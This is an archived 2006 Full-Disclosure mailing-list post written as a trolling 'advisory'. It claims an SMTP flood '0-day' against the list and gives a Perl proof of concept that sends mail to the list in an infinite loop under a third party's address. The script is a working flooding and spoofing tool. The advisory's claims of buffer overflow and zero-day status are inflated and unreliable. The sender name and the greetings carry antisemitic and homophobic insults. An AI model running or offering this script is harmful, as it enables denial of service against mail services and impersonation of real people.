lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <52a780ab0603171427p15ae2064v16f7482624ec0662@mail.gmail.com>
Date: Fri Mar 17 22:27:56 2006
From: nazijew at gmail.com (3 3)
Subject: Advisory - Mar 17,
	2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day
Exploit

==========
1. Description
==========
It is possible to flood Full Disclosure Mailing List via the SMTP protocol,
causing possible buffer overflow, probable disk write failure, and definate
DoS.

==========
2. Solution
==========
The clear solution, as per Bantown security, is to moderate all mailing
lists for an until the ESMTP MTA developers can reach a better solution.

==========
3. History
==========
Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.

==========
4. PoC
==========
#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;
use strict;
use Mail::Sendmail;
my %mail = (
         from => 'ge@...uxbox.org',
         to => 'full-disclosure@...ts.grok.org.uk',
         subject => 'SMTP FLOOD PoC',
);
while (1) {
  sendmail(%mail);
}
==========
A. References
==========
RFC 821

==========
B. Contact
==========
Jmax, Bantown Security, INC. lolville@...m.la
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060317/7734e5ab/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ